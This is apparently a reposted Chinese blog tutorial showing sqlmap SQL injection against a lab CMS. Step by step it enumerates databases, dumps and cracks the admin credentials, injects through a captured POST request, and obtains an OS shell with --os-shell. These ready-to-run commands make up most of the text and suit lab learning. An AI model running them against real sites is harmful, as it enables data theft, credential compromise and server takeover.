iis服务器助手广告广告
返回顶部
首页 > 资讯 > 操作系统 >SQLmap使用
  • 658
分享到

SQLmap使用

网络安全 2023-08-30 10:08:35 658人浏览 泡泡鱼
摘要

文章目录 利用sqlmap 注入得到cms网站后台管理员账密获取数据库名称获取cms数据库的表名获取users表中的字段(内容)获取username字段和password字段的内容 salmap破解psot请求数据包salmap

利用sqlmap 注入得到cms网站后台管理员账密

获取数据库名称

在kali中输入sqlmap命令,打开sqlmap,然后输入下面命令:

sqlmap -u Http://10.9.75.33/cms/show.PHP?id=33 --dbs --batch

结果如下:

在这里插入图片描述

获取cms数据库的表名

输入下面命令:

sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs -D “cms” --tables --batch

结果如下:

得到cms中的所有表名

在这里插入图片描述

获取users表中的字段(内容)

输入下面命令:

sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D “cms” -T “cms_users” --columns --batch

结果如下,users表中有三个字段:

在这里插入图片描述

获取username字段和passWord字段的内容

即获取账号密码,输入下面命令:

sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" -C "username,password" --dump

在弹出的两次交互信息中输入n,得到账号和md5密码密文:

在这里插入图片描述

口算md5密文(其实是用工具解密),得到用户名和密码:

admin

123456

salmap破解psot请求数据包

在后台网页用火狐代理、bp抓包,在http history中查看抓到的数据包,将抓到的post请求包复制

在这里插入图片描述

输入下面命令,在tmp目录下新建一个txt文件并用vim编辑器编辑,将post数据包的内容放入txt文件中:

touch /tmp/post.txt
vim /tmp/post.txt

在这里插入图片描述

命令模式下保存退出

输入下面命令破解post请求包:

salmap -r /tmp/post.txt

在交互式命令时回车,是否追踪302输入no:

在这里插入图片描述

耐心等待完成,显示了两种注入方法,报错注入和布尔盲注:

在这里插入图片描述

爆破密码:

sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump

爆破成功:

在这里插入图片描述

salmap获取getshell

在kali控制台输入下面命令:

sqlmap -u "http://10.9.75.33/cms/show.php?id=33" --os-shell

选择语言:
在这里插入图片描述

选择路径,2是自选路径,选择2:

在这里插入图片描述

路径填:

c:/phpstudy/www/

获取成功:

在这里插入图片描述

来源地址:https://blog.csdn.net/m0_56578216/article/details/132484191

--结束END--

本文标题: SQLmap使用

本文链接: https://www.lsjlt.com/news/382600.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑,方便收藏和打印~

下载Word文档
猜你喜欢
  • SQLmap使用
    文章目录 利用sqlmap 注入得到cms网站后台管理员账密获取数据库名称获取cms数据库的表名获取users表中的字段(内容)获取username字段和password字段的内容 salmap破解psot请求数据包salmap...
    99+
    2023-08-30
    网络安全
  • SQLmap 扫描工具的使用
    一、SQLMap拖库: SQLMap可以完成注入点的发现,数据库类型的确认,WebShell权限和路径的确认,拖库等一系列功能。测试的Payload共分为5级:Level 1 ~ Level 5,Level 1属于基础级,Payload相对...
    99+
    2023-08-31
    数据库 php mysql
  • sqlmap之os shell怎么使用
    这篇文章主要介绍“sqlmap之os shell怎么使用”,在日常操作中,相信很多人在sqlmap之os shell怎么使用问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”sqlmap之os...
    99+
    2023-07-05
  • sqlmap的成熟使用方法
    # 爆一下数据库名称 sqlmap -u "http://192.168.22.129/index.phpr=vul&keyword=1" -p keyword --dbs或 sqlmap -u "http://192.168.22.129...
    99+
    2023-09-12
    php 数据库 服务器
  • sqlmap的--os-shell
    一、常用语法 sqlmap -u 注入点 --os-shell 二、原理 前提条件 1、sqlmap要提供的信息 (1)、已知网站的编程语言:PHP、JSP、ASP、ASPX; (2)、已知网站的物理路径; 2、mysql...
    99+
    2023-09-06
    php 开发语言 web安全 sql Powered by 金山文档
  • sqlmap中的--sql-shell
    文章目录 命令文件路径查看版本读写文件常见的找绝对路径方法:查看php是否开启魔术引导 udf下一步使用sqlmap --os-shell参考 命令 sqlmap -u --sql-shell 之后就和sql中的命令一样 文...
    99+
    2023-08-17
    sql 数据库 mysql
  • 渗透测试工具sqlmap怎么用
    这篇文章主要介绍渗透测试工具sqlmap怎么用,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!一、检测注入点是否可用C:\Python27\sqlmap>python ...
    99+
    2024-04-02
  • sqlmap注入图文详解
    目录1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。2.现在拿出我们的kali工具,sqlmap进行注入测试。3.可以看到存在注入漏洞,扫到了5个数据...
    99+
    2024-04-02
  • python3中SQLMap如何安装
    本篇内容介绍了“python3中SQLMap如何安装”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!注意:在python3环境下安装sqlma...
    99+
    2023-07-05
  • 安装sqlmap+python正确姿势
    简单说一下,SQLMap是利用Python语言写的,所以需要将Python这个语言环境给安装上。具体SQLMap的功能就不在这里介绍了,只介绍安装过程; 工具/原料 Win7或者win8系统 Python2.7...
    99+
    2023-01-31
    姿势 正确 sqlmap
  • 利用sqlmap进行post注入学习笔记
    了解sqlmap sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,...
    99+
    2023-08-31
    网络安全 mysql web安全 Powered by 金山文档
  • SQL注入之sqlmap入门学习
    目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称...
    99+
    2023-05-12
    sqlmap入门 sqlmap注入
  • sqlmap之os shell图文详细解析
    目录0x00 Background0x01 Environment[0x02 Attack demo(1)环境测试(2)攻击(3)选择语言(4)输入绝对路径(5)建立os-shell并执行命...
    99+
    2023-03-02
    sqlmap os shell sqlmap os-shell sqlmap命令详解
  • 怎么提高sqlmap爆破效率
    本篇内容介绍了“怎么提高sqlmap爆破效率”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成! 提高sqlmap爆破效率sqlmap在...
    99+
    2023-06-04
  • 如何编写SQLMap的Tamper脚本
    本篇内容介绍了“如何编写SQLMap的Tamper脚本”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这些情况吧!希望大家仔细阅读,能够学有所成!测试环境最新版某狗测试方法安全狗其实是比...
    99+
    2023-07-05
  • sqlmap之os shell图文详细解析
    目录0x00 Background0x01 Environment[0x02 Attack demo(1)环境测试(2)攻击(3)选择语言(4)输入绝对...
    99+
    2023-03-02
    sqlmap os shell sqlmap os-shell sqlmap命令详解
  • 教你编写SQLMap的Tamper脚本过狗
    目录测试环境最新版某狗测试方法bypassandorder byunion select加个换行试试获取表字段编写tamper测试环境 最新版某狗 测试方法 安全狗其实是比较好绕的WAF,绕过方...
    99+
    2023-02-24
    SQLMap的Tamper脚本 SQLMap过狗脚本 SQLMap Tamper
  • sqlmap扫描注入点出错怎么解决
    如果使用sqlmap扫描注入点出现错误,可以尝试以下解决方法:1. 确认目标网站是否存在注入漏洞,可以使用其他工具或手动测试确认。2...
    99+
    2023-05-16
    sqlmap扫描注入点 sqlmap
  • python编写WAF与Sqlmap结合实现指纹探测
    目录编写探测识别WAF脚本00x1:WAF的特征00x2:测试00x3:收集wafPyhacker 之 编写SQLMAP Waf探测使用Python编写探测WAF指纹脚本,再结合到S...
    99+
    2024-04-02
  • 【2023最新版】超详细Sqlmap安装保姆级教程,SQL注入使用指南,收藏这一篇就够了
    一、sqlmap简介 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQL Server、IBM DB2、S...
    99+
    2023-08-31
    数据库 php 网络 web安全 系统安全
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作